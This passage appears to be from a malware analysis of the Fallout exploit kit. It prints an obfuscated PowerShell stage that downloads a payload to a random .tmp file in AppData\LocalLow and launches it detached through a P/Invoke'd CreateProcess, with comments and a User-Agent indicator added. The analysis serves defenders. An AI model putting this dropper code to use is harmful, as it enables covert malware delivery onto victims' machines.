#   lI1I1l1l - 18 fields beginning with a uint cb match STARTUPINFO
#   I1l11lIl - static wrapper class for CreateProcess
# The [DllImport("kernel32.dll")] attribute an extern CreateProcess needs, the
# closing "@ of the here-string and the braces do not appear in this listing
# (lost in extraction or trimmed by the author).
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

public struct lI111
    public IntPtr llIll;
    public IntPtr II1ll1I1;
    public uint llllIlI;
    public uint l1l1l;

public struct lI1I1l1l
    public uint lI1lI1I;
    public string l1l1II1;
    public string llIlI1;
    public string IlIl1l;
    public uint ll1llI11;
    public uint ll1l11I1;
    public uint IlI11lI;
    public uint IIlIll1I;
    public uint IIl1II;
    public uint I11Il;
    public uint IIIIII;
    public uint l1IlIll;
    public short llI11l1;
    public short llll1I11;
    public IntPtr I1llIIlI;
    public IntPtr Il1I11lI;
    public IntPtr llllll;
    public IntPtr lI1l1I1I;

public static class I1l11lIl
    public static extern bool CreateProcess(string I1l1Il1I,string l1111,IntPtr lllI111,IntPtr I111IIlI,bool lllll,uint III1l1l1,IntPtr l1l1l11l,string lIll1111,ref lI1I1l1l l111l,out lI111 I1111l1);

# Drop path: %USERPROFILE%\AppData\LocalLow\<8 random chars from 0-9, A-Z, a-z>.tmp
$lIlI1 = "$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp";
# Payload URL (redacted in the write-up).
$Il11l = '';

$cli = (New-Object Net.WebClient);
# Hard-coded, uncommon User-Agent; a usable network indicator for this stage.
$cli.Headers['User-Agent'] = 'pqqyW56Fe8W2G7m3';
$cli.DownloadFile($Il11l, $lIlI1);

# If lI1I1l1l is STARTUPINFO, llI11l1 is wShowWindow (set to 0 = SW_HIDE) and
# lI1lI1I is cb; dwFlags (l1IlIll) is left 0, so without STARTF_USESHOWWINDOW
# the wShowWindow value is probably ignored.
$llII11l = New-Object lI1I1l1l;
$llII11l.llI11l1 = 0x0;
$llII11l.lI1lI1I = [System.Runtime.InteropServices.Marshal]::SizeOf($llII11l);
$I1111111 = New-Object lI111;
# CreateProcess(app, cmdline, NULL, NULL, inherit=false, flags=0x8 (DETACHED_PROCESS),
# env=NULL, cwd="c:", &si, &pi); the return value is discarded.
[I1l11lIl]::CreateProcess($lIlI1, $lIlI1, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x00000008, [IntPtr]::Zero, "c:", [ref]$llII11l, [ref]$I1111111)|out-null;

This PowerShell code downloads the malware to a randomly named .tmp file under %USERPROFILE%\AppData\LocalLow and launches it through a P/Invoke'd CreateProcess (creation flag 0x8, DETACHED_PROCESS). The download uses an uncommon hard-coded User-Agent ('pqqyW56Fe8W2G7m3'), which is a useful network indicator.


Fallout has evolved again, and analysis has become harder than before. Keep an eye on Fallout going forward.